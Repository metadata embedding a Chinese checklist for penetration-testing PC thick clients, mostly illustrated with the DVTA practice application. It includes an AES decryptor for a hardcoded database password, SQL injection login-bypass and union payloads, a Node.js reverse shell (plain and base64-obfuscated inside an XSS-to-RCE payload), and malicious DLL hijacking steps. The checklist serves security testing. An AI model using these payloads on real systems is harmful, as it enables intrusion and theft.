{"id":13539120,"url":"https://github.com/thelsa/cs-checklist","last_synced_at":"2025-04-02T06:30:30.726Z","repository":{"id":54283661,"uuid":"207863838","full_name":"theLSA/CS-checklist","owner":"theLSA","description":"PC客户端（C-S架构）渗透测试checklist / Client side(C-S) penetration checklist","archived":false,"fork":false,"pushed_at":"2021-02-24T17:41:14.000Z","size":31588,"stargazers_count":660,"open_issues_count":0,"forks_count":167,"subscribers_count":22,"default_branch":"master","last_synced_at":"2025-03-13T14:37:24.568Z","etag":null,"topics":["client-side","cs-checklist","penetration"],"latest_commit_sha":null,"homepage":"","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/theLSA.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2019-09-11T17:02:19.000Z","updated_at":"2025-01-17T16:15:39.000Z","dependencies_parsed_at":"2022-08-13T11:00:16.845Z","dependency_job_id":null,"html_url":"https://github.com/theLSA/CS-checklist","commit_stats":null,"previous_names":[],"tags_count":1,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/theLSA%2FCS-checklist","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/theLSA%2FCS-checklist/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/theLSA%2FCS-checklist/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/theLSA%2FCS-checklist/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/theLSA","download_url":"https://codeload.github.com/theLSA/CS-checklist/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":246767491,"owners_count":20830499,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["client-side","cs-checklist","penetration"],"created_at":"2024-08-01T09:01:20.453Z","updated_at":"2025-04-02T06:30:25.703Z","avatar_url":"https://github.com/theLSA.png","language":null,"funding_links":[],"categories":["\u003ca id=\"8c5a692b5d26527ef346687e047c5c21\"\u003e\u003c/a\u003e收集","\u003ca id=\"e97d183e67fa3f530e7d0e7e8c33ee62\"\u003e\u003c/a\u003e未分类"],"sub_categories":["\u003ca id=\"f110da0bf67359d3abc62b27d717e55e\"\u003e\u003c/a\u003e新添加的"],"readme":"# **CS-checklist**\r\n\r\n\u003cbr/\u003e\r\n\r\n## **目录**\r\n\r\n   * [\u003cstrong\u003eCS-checklist\u003c/strong\u003e](#cs-checklist)\r\n      * [\u003cstrong\u003e0x00 前言\u003c/strong\u003e](#0x00-前言)\r\n      * [\u003cstrong\u003e0x01 概述\u003c/strong\u003e](#0x01-概述)\r\n      * [\u003cstrong\u003e0x02 开发语言\u003c/strong\u003e](#0x02-开发语言)\r\n      * [\u003cstrong\u003e0x03 协议\u003c/strong\u003e](#0x03-协议)\r\n      * [\u003cstrong\u003e0x04 数据库\u003c/strong\u003e](#0x04-数据库)\r\n      * [\u003cstrong\u003e0x05 测试工具\u003c/strong\u003e](#0x05-测试工具)\r\n      * [\u003cstrong\u003e0x06 代理设置\u003c/strong\u003e](#0x06-代理设置)\r\n      * [\u003cstrong\u003e0x07 测试点\u003c/strong\u003e](#0x07-测试点)\r\n         * [\u003cstrong\u003e0.\u003c/strong\u003e \u003cstrong\u003e信息收集\u003c/strong\u003e](#0-信息收集)\r\n         * [\u003cstrong\u003e1.\u003c/strong\u003e \u003cstrong\u003e逆向工程\u003c/strong\u003e](#1-逆向工程)\r\n         * [\u003cstrong\u003e2.\u003c/strong\u003e \u003cstrong\u003e信息泄露\u003c/strong\u003e](#2-信息泄露)\r\n         * [\u003cstrong\u003e3.\u003c/strong\u003e \u003cstrong\u003e传输流量\u003c/strong\u003e](#3-传输流量)\r\n         * [\u003cstrong\u003e4.\u003c/strong\u003e \u003cstrong\u003e其他漏洞\u003c/strong\u003e](#4-其他漏洞)\r\n            * [\u003cstrong\u003e用户名枚举\u003c/strong\u003e](#用户名枚举)\r\n            * [\u003cstrong\u003e暴力破解\u003c/strong\u003e](#暴力破解)\r\n            * [\u003cstrong\u003e弱口令\u003c/strong\u003e](#弱口令)\r\n            * [\u003cstrong\u003e密码明文传输\u003c/strong\u003e](#密码明文传输)\r\n            * [\u003cstrong\u003eSQL语句暴露\u003c/strong\u003e](#sql语句暴露)\r\n            * [\u003cstrong\u003eSQL注入\u003c/strong\u003e](#sql注入)\r\n            * [\u003cstrong\u003eCSV注入\u003c/strong\u003e](#csv注入)\r\n            * [\u003cstrong\u003eXSS\u003c/strong\u003e](#xss)\r\n            * [\u003cstrong\u003e命令执行\u003c/strong\u003e](#命令执行)\r\n            * [\u003cstrong\u003eDLL劫持\u003c/strong\u003e](#dll劫持)\r\n            * [\u003cstrong\u003e逻辑缺陷\u003c/strong\u003e](#逻辑缺陷)\r\n            * [\u003cstrong\u003e授权认证缺陷\u003c/strong\u003e](#授权认证缺陷)\r\n            * [\u003cstrong\u003e未授权\u003c/strong\u003e](#未授权)\r\n            * [\u003cstrong\u003e越权\u003c/strong\u003e](#越权)\r\n            * [\u003cstrong\u003e溢出\u003c/strong\u003e](#溢出)\r\n      * [\u003cstrong\u003e0x08 相关技巧\u003c/strong\u003e](#0x08-相关技巧)\r\n      * [\u003cstrong\u003e0x09 参考资料\u0026amp;\u0026amp;相关资源\u003c/strong\u003e](#0x09-参考资料相关资源)\r\n\r\n\u003cbr/\u003e\r\n\r\n## **0x00 前言**\r\n\r\n本项目主要针对pc客户端（cs架构）渗透测试，结合自身测试经验和网络资料形成checklist，如有任何问题，欢迎联系，期待大家贡献更多的技巧和案例。\r\n\r\n\u003cbr/\u003e\r\n\r\n## **0x01 概述**\r\n\r\nPC客户端，有丰富功能的GUI，C-S架构。\r\n\r\n![cs00](https://github.com/theLSA/cs-checklist/raw/master/demo/cs00.png)\r\n\r\n//图片源自:\r\n\r\n[https://resources.infosecinstitute.com/practical-thick-client-application-penetration-testing-using-damn-vulnerable-thick-client-app-part-1/#article](#article)\r\n\r\n\u003cbr/\u003e\r\n\r\n## **0x02 开发语言**\r\n\r\nC#(.NET)，JAVA，DELPHI，C，C++......\r\n\r\n\u003cbr/\u003e \r\n\r\n## **0x03 协议**\r\n\r\nTCP、HTTP(S)，TDS......\r\n\r\n\u003cbr/\u003e \r\n\r\n## **0x04 数据库**\r\n\r\noracle，mssql，db2......\r\n\r\n\u003cbr/\u003e \r\n\r\n## **0x05 测试工具**\r\n\r\n//相关工具下载：https://github.com/theLSA/hack-cs-tools\r\n\r\ndvta： pc客户端靶场\r\n\r\nida pro： 静态分析工具\r\n\r\nollydbg：动态分析工具\r\n\r\nCFF Explorer：PE文件分析\r\n\r\nPEID：查壳工具\r\n\r\nexeinfope/studype：pe文件分析\r\n\r\nwireshark：观察流量\r\n\r\ntcpview：观察tcp流量\r\n\r\necho Mirage：可拦截tcp流量\r\n\r\nburpsuite：http(s)抓包\r\n\r\nproxifier：全局代理流量\r\n\r\nprocmon：文件和注册表监控\r\n\r\nregshot：注册表变化对比\r\n\r\nprocess Hacker：进程分析\r\n\r\nRegfromApp：注册表监控\r\n\r\nWSExplorer：岁月联盟进程抓包工具\r\n\r\nstrings：查看程序的字符串\r\n\r\n\u003cbr/\u003e \r\n\r\n.net[反]编译：\r\n\r\ndotpeek\r\n\r\nde4dot\r\n\r\ndnspy\r\n\r\nilspy\r\n\r\nsae\r\n\r\nildasm\r\n\r\nilasm\r\n\r\n\u003cbr/\u003e \r\n\r\nJava反编译\r\n\r\njad\r\n\r\njd-gui\r\n\r\njadx\r\n\r\ndex2jar\r\n\r\n在线版：\u003cbr/\u003e\r\n[javare.cn]()\r\n\r\nwww.javadecompilers.com\r\n\r\n\u003cbr/\u003e\r\n\r\nReflexil：组装编辑器（可以作为ilspy插件）\r\n\r\nVcg：自动化代码审计工具\r\n\r\nBinScope：二进制分析工具\r\n\r\n\u003cbr/\u003e \r\n\r\n## **0x06 代理设置**\r\n\r\n大部分客户端没有代理配置功能，需要自行设置全局代理，如下两种方法：\r\n\r\n1）IE-internet设置-连接-局域网设置。\r\n\r\n2）proxifier --\u003e proxy server/proxification rules\r\n\r\n//http的流量可以结合burpsuite方便测试（proxy server设置为burp代理地址）。\r\n\r\n![cs24](https://github.com/theLSA/cs-checklist/raw/master/demo/cs24.png)\r\n\r\n![cs25](https://github.com/theLSA/cs-checklist/raw/master/demo/cs25.png)\r\n\r\n![cs26](https://github.com/theLSA/cs-checklist/raw/master/demo/cs26.png)\r\n\r\n\u003cbr/\u003e \r\n\r\n## **0x07 测试点**\r\n\r\n\u003cbr/\u003e \r\n\r\n### **0.** **信息收集**\r\n\r\n编译信息，开发环境/语言，使用协议，数据库，ip，混淆/加密，是否加壳等。\r\n\r\n\u003cbr/\u003e\r\n\r\n案例0-CFF查看客户端信息（如编译环境）\r\n\r\ndvta\r\n\r\n![cs01](https://github.com/theLSA/cs-checklist/raw/master/demo/cs01.png)\r\n\r\n\u003cbr/\u003e\u003cbr/\u003e \r\n\r\n### **1.** **逆向工程**\r\n\r\n反编译，源代码泄露，硬编码key/password，加解密逻辑，角色判断逻辑（0-admin，1-normaluser），后门等。 \r\n\r\n\u003cbr/\u003e\r\n\r\n案例0-反编译获取加解密逻辑并编写解密工具\r\n\r\ndvta\r\n\r\n![cs02](https://github.com/theLSA/cs-checklist/raw/master/demo/cs02.png)\r\n\r\n通过该逻辑和获取的信息\r\n\r\n![cs03](https://github.com/theLSA/cs-checklist/raw/master/demo/cs03.png)\r\n\r\n**Encrypted Text:** CTsvjZ0jQghXYWbSRcPxpQ==\r\n\r\n**AES KEY:** J8gLXc454o5tW2HEF7HahcXPufj9v8k8\r\n\r\n**IV:** fq20T0gMnXa6g0l4\r\n\r\n编写解密工具\r\n\r\n`using System;`\r\n`using System.Collections.Generic;`\r\n`using System.ComponentModel;`\r\n`using System.Data;`\r\n\r\n`using System.Drawing;`\r\n\r\n`using System.Linq;`\r\n\r\n`using System.Text;`\r\n\r\n`using System.Threading.Tasks;`\r\n\r\n`using System.Windows.Forms;`\r\n\r\n`using System.Security.Cryptography;`\r\n\r\n`namespace aesdecrypt`\r\n\r\n`{`\r\n\r\n​    `public partial class aesdecrypt : Form`\r\n\r\n​    `{`\r\n\r\n​        `public aesdecrypt()`\r\n\r\n​        `{`\r\n\r\n​            `InitializeComponent();`\r\n\r\n​        `}`\r\n\r\n​        `private void decrypt(object sender, EventArgs e)`\r\n\r\n​        `{`\r\n\r\n​            `String key = “J8gLXc454o5tW2HEF7HahcXPufj9v8k8”;`\r\n\r\n​            `String IV = “fq20T0gMnXa6g0l4”;`\r\n\r\n​            `String encryptedtext = “CTsvjZ0jQghXYWbSRcPxpQ==”;`\r\n\r\n​            `byte[] encryptedBytes = Convert.FromBase64String(encryptedtext);`\r\n\r\n​            `AesCryptoServiceProvider aes = new AesCryptoServiceProvider();`\r\n\r\n​            `aes.BlockSize = 128;`\r\n\r\n​            `aes.KeySize = 256;`\r\n\r\n​            `aes.Key = System.Text.ASCIIEncoding.ASCII.GetBytes(key);`\r\n\r\n​            `aes.IV = System.Text.ASCIIEncoding.ASCII.GetBytes(IV);`\r\n\r\n​            `aes.Padding = PaddingMode.PKCS7;`\r\n\r\n​            `aes.Mode = CipherMode.CBC;`\r\n\r\n​            `ICryptoTransform crypto = aes.CreateDecryptor(aes.Key, aes.IV);`\r\n\r\n​            `byte[] decryptedbytes = crypto.TransformFinalBlock(encryptedBytes, 0, encryptedBytes.Length);`\r\n\r\n​            `String decryptedString = System.Text.ASCIIEncoding.ASCII.GetString(decryptedbytes);`\r\n\r\n​            `Console.WriteLine(“\\n”);`\r\n\r\n​            `Console.WriteLine(“##########Decryptig Database password##########\\n”);`\r\n\r\n​            `Console.WriteLine(“Decrypted Database password:” + decryptedString+”\\n”);`\r\n\r\n​            `Console.WriteLine(“##########Done##########\\n”);`\r\n\r\n​        `}`\r\n\r\n​    `}`\r\n\r\n`}`\r\n\r\n//解密代码源自https://resources.infosecinstitute.com/damn-vulnerable-thick-client-app-part-5/#article\r\n\r\n\u003cbr/\u003e\r\n\r\n案例1-反编译修改代码逻辑让普通用户以管理员登录\r\n\r\ndvta\r\n\r\n1-Isadmin\r\n\r\n0-Normaluser\r\n\r\n改1为0即可判断为admin\r\n\r\n![cs04](https://github.com/theLSA/cs-checklist/raw/master/demo/cs04.png)\r\n\r\n![cs05](https://github.com/theLSA/cs-checklist/raw/master/demo/cs05.png)\r\n\r\n\u003cbr/\u003e\u003cbr/\u003e\r\n\r\n### **2.** **信息泄露**\r\n\r\n明文敏感信息，敏感文件（如安装目录下的xxx.config）。\r\n\r\n注册表：利用regshot比较客户端运行（如登录）前后注册表差别。 \r\n\r\n开发调试日志泄露（如dvta.exe \u003e\u003e log.txt）\r\n\r\nprocess hacker查看客户端内存中的明文敏感数据（如账号密码/key）。\r\n\r\nstrings直接查看客户端字符串（如ip信息）。\r\n\r\n查看源代码（如github,gitee等）\r\n\r\n\u003cbr/\u003e\r\n\r\n案例0-配置敏感信息泄露\r\n\r\ndvta\r\n\r\n![cs06](https://github.com/theLSA/cs-checklist/raw/master/demo/cs06.png)\r\n\r\n\u003cbr/\u003e\r\n\r\n案例1-内存泄露数据库账号密码\r\n\r\ndvta\r\n\r\n![cs07](https://github.com/theLSA/cs-checklist/raw/master/demo/cs07.png)\r\n\r\n\u003cbr/\u003e\r\n\r\n案例2-源代码含有硬编码ftp账号密码\r\n\r\ndvta\r\n\r\n![cs08](https://github.com/theLSA/cs-checklist/raw/master/demo/cs08.png)\r\n\r\n\u003cbr/\u003e \r\n\r\n案例3-开发调试日志泄露\r\n\r\ndvta\r\n\r\n![cs09](https://github.com/theLSA/cs-checklist/raw/master/demo/cs09.png)\r\n\r\n\u003cbr/\u003e\r\n\r\n案例4-某系统登录后本地保存账号密码\r\n\r\n![cs10](https://github.com/theLSA/cs-checklist/raw/master/demo/cs10.png)\r\n\r\n//本案例来源于https://blog.csdn.net/weixin_30685047/article/details/95916065\r\n\r\n\u003cbr/\u003e\u003cbr/\u003e \r\n\r\n### **3.** **传输流量**\r\n\r\nwireshark/echo Mirage/burpsuite+nopeproxy/fillder/charles\r\n\r\nftp等协议明文传输的账号密码\r\n\r\nSQL语句明文传输（如利用构造注入，越权等）\r\n\r\n\u003cbr/\u003e\r\n\r\n案例0-正方教务系统sql语句明文传输，返回明文数据\r\n\r\n![cs11](https://github.com/theLSA/cs-checklist/raw/master/demo/cs11.png)\r\n\r\n![cs12](https://github.com/theLSA/cs-checklist/raw/master/demo/cs12.png)\r\n\r\n//本案例来源于wooyun\r\n\r\n\u003cbr/\u003e\r\n\r\n案例1-某系统登录处数据包返回数据库帐号密码\r\n\r\n![cs28](https://github.com/theLSA/cs-checklist/raw/master/demo/cs28.png)\r\n\r\n\u003cbr/\u003e\u003cbr/\u003e\r\n\r\n### **4.** **其他漏洞**\r\n\r\n\r\n\r\n#### **用户名枚举**\r\n\r\n案例0\r\n\r\n![](https://github.com/theLSA/cs-checklist/raw/master/demo/cs13.png)\r\n\r\n![](https://github.com/theLSA/cs-checklist/raw/master/demo/cs14.png)\r\n\r\n\u003cbr/\u003e\r\n\r\n\r\n\r\n#### **暴力破解**\r\n\r\n如登录功能。\r\n\r\n案例0\r\n\r\n![](https://github.com/theLSA/cs-checklist/raw/master/demo/cs23.png)\r\n\r\n\u003cbr/\u003e\r\n\r\n\r\n\r\n#### **弱口令**\r\n\r\n可尝试admin 123456等。\r\n\r\n\u003cbr/\u003e\r\n\r\n\r\n\r\n#### **密码明文传输** \r\n\r\n\u003cbr/\u003e\r\n\r\n\r\n\r\n#### **SQL语句暴露**\r\n\r\n案例0\r\n\r\n![cs15](https://github.com/theLSA/cs-checklist/raw/master/demo/cs15.png)\r\n\r\n\u003cbr/\u003e\r\n\r\n案例1\r\n\r\n![cs27](https://github.com/theLSA/cs-checklist/raw/master/demo/cs27.png)\r\n\r\n\u003cbr/\u003e\r\n\r\n\r\n\r\n#### **SQL注入**\r\n\r\n如登录处，万能密码\r\n\r\nxxx’ or ‘x’=’x\r\n\r\nxxx’ or 1=1--\r\n\r\n输入框处，构造闭合报错，如’、’)、%’)、order by 100--等。\r\n\r\n利用显示位或报错注出数据，原理同web注入，不同数据库大同小异。\r\n\r\n\u003cbr/\u003e \r\n\r\n案例0-oracle注入\r\n\r\n' union select null,null,(select user from dual),null,null,(select banner from sys.v_$version where \trownum=1),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null from dual--\r\n\r\n![cs16](https://github.com/theLSA/cs-checklist/raw/master/demo/cs16.png)\r\n\r\n\u003cbr/\u003e\r\n\r\n案例1-mssql注入\r\n\r\n111') and (select user)\u003e0--\r\n\r\n![cs17](https://github.com/theLSA/cs-checklist/raw/master/demo/cs17.png)\r\n\r\n\u003cbr/\u003e\r\n\r\n#### **CSV注入**\r\n\r\n如导出excel，输入1+1，导出后看是否为2。\r\n\r\n\u003cbr/\u003e \r\n\r\n#### **XSS**\r\n\r\n如Electron，NodeWebKit等。\r\n\r\n\u003cbr/\u003e \r\n\r\n案例0-中国蚁剑xss到rce\r\n\r\n环境：win7+phpstudy(php5.6.27-nts)+perl+nc+antsword2.0.5\r\n\r\nxss webshell：\r\n\r\n`\u003c?php`\r\n\r\n`header('HTTP/1.1 500 \u003cimg src=# onerror=alertx\u003e');`\r\n\r\n![cs18](https://github.com/theLSA/cs-checklist/raw/master/demo/cs18.png)\r\n\r\nwindows+node.js:\r\n\r\n成功\r\n\r\n`var net = require(\"net\"), sh = require(\"child_process\").exec(\"cmd.exe\");`\r\n\r\n`var client = new net.Socket();`\r\n\r\n`client.connect(6677, \"127.0.0.1\", function(){client.pipe(sh.stdin);sh.stdout.pipe(client);`\r\n\r\n`sh.stderr.pipe(client);});`\r\n\r\n \r\n\r\n`\u003c?php`\r\n\r\n`header(\"HTTP/1.1 500 Not \u003cimg src=# onerror='eval(new Buffer(`dmFyIG5ldCA9IHJlcXVpcmUoIm5ldCIpLCBzaCA9IHJlcXVpcmUoImNoaWxkX3Byb2Nlc3MiKS5leGVjKCJjbWQuZXhlIik7CnZhciBjbGllbnQgPSBuZXcgbmV0LlNvY2tldCgpOwpjbGllbnQuY29ubmVjdCg2Njc3LCAiMTI3LjAuMC4xIiwgZnVuY3Rpb24oKXtjbGllbnQucGlwZShzaC5zdGRpbik7c2guc3Rkb3V0LnBpcGUoY2xpZW50KTsKc2guc3RkZXJyLnBpcGUoY2xpZW50KTt9KTs=`,`base64`).toString())'\u003e\");`\r\n\r\n`?\u003e`\r\n\r\n![cs19](https://github.com/theLSA/cs-checklist/raw/master/demo/cs19.png)\r\n\r\n相关参考\r\n\r\nhttps://www.anquanke.com/post/id/176379\r\n\r\n\u003cbr/\u003e \r\n\r\n#### **命令执行**\r\n\u003cbr/\u003e\r\n案例0-印象笔记windows客户端6.15本地文件读取和远程命令执行 \r\n\r\n[http://blog.knownsec.com/2018/11/%E5%8D%B0%E8%B1%A1%E7%AC%94%E8%AE%B0-windows-%E5%AE%A2%E6%88%B7%E7%AB%AF-6-15-%E6%9C%AC%E5%9C%B0%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E5%92%8C%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/](http://blog.knownsec.com/2018/11/印象笔记-windows-客户端-6-15-本地文件读取和远程命令执行/)\r\n\r\n\u003cbr/\u003e \r\n\r\n案例1-某云pc客户端命令执行挖掘过程 \r\n\r\nhttps://www.secpulse.com/archives/53852.html\r\n\r\n\u003cbr/\u003e \r\n\r\n案例2-金山WPS Mail邮件客户端远程命令执行漏洞(Mozilla系XUL程序利用技巧) \r\n\r\nhttps://shuimugan.com/bug/view?bug_no=193117\r\n\r\n\u003cbr/\u003e \r\n\r\n测试点同web。\r\n\r\n\u003cbr/\u003e  \r\n\r\n\u003cbr/\u003e \r\n\r\n#### **DLL劫持**\r\n\r\nLinux文件搜索顺序：\r\n\r\n1. 当前目录\r\n\r\n2. PATH顺序值目录\r\n\r\n\u003cbr/\u003e\r\n\r\n程序搜索Dll顺序：\r\n\r\n//没提供绝对路径\r\n\r\n1.应用程序加载的目录。\r\n\r\n2.当前目录。\r\n\r\n3.系统目录 (C:\\\\Windows\\\\System32\\\\)。\r\n\r\n4.16位的系统目录。\r\n\r\n5.Windows目录。\r\n\r\n6.PATH变量的目录。\r\n\r\n程序可以加载攻击者放置的恶意dll。\r\n\r\n利用procmon搜索程序加载的dll，观察name not found。\r\n\r\nmsf生成恶意dll放置于程序加载位置，运行程序即可触发payload。\r\n\r\n\u003cbr/\u003e \r\n\r\n案例0-dll劫持\r\n\r\ndvta\r\n\r\n![cs20](https://github.com/theLSA/cs-checklist/raw/master/demo/cs20.png)\r\n\r\n![cs21](https://github.com/theLSA/cs-checklist/raw/master/demo/cs21.png)\r\n\r\n\u003cbr/\u003e\r\n\r\n\r\n\r\n#### **逻辑缺陷**\r\n\r\n测试点同web。\r\n\r\n\u003cbr/\u003e\r\n\r\n\r\n\r\n#### **授权认证缺陷**\r\n\r\n注册表键值，授权服务器返回信息构造。\r\n\r\n相关参考\r\n\r\nhttps://cloud.tencent.com/developer/article/1430899\r\n\r\n\u003cbr/\u003e \r\n\r\n\u003cbr/\u003e \r\n\r\n#### **未授权**\r\n\r\n\u003cbr/\u003e \r\n\r\n案例0-正方教务系统数据库任意操作\r\n\r\n知道ip即可接管数据库\r\n\r\n![cs22](https://github.com/theLSA/cs-checklist/raw/master/demo/cs22.png)\r\n\r\n//本案例来源于wooyun\r\n\r\n\u003cbr/\u003e\r\n\r\n\r\n\r\n#### **越权**\r\n\r\n\u003cbr/\u003e\r\n\r\n\r\n\r\n#### **溢出**\r\n\r\n\u003cbr/\u003e\u003cbr/\u003e\r\n\r\n## **0x08 相关技巧**\r\n\r\n0. 利用procexp --\u003e properties --\u003e tcp/ip 可以查看该客户端发起的网络连接，从而快速确定服务端地址\r\n\r\n1. wireshark直接过滤出服务器或数据库的ip或协议方便查看，如\r\n\r\nip.addr == 1.2.3.4\u0026\u0026http\r\n\r\n2. 如果有数据库账号，可以用数据库监控sql语句操作（如sql server profiler）。\r\n\r\n\u003cbr/\u003e\u003cbr/\u003e \r\n\r\n## **0x09 参考资料\u0026\u0026相关资源**\r\n\r\n[https://resources.infosecinstitute.com](https://resources.infosecinstitute.com/)\r\n\r\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fthelsa%2Fcs-checklist","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fthelsa%2Fcs-checklist","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fthelsa%2Fcs-checklist/lists"}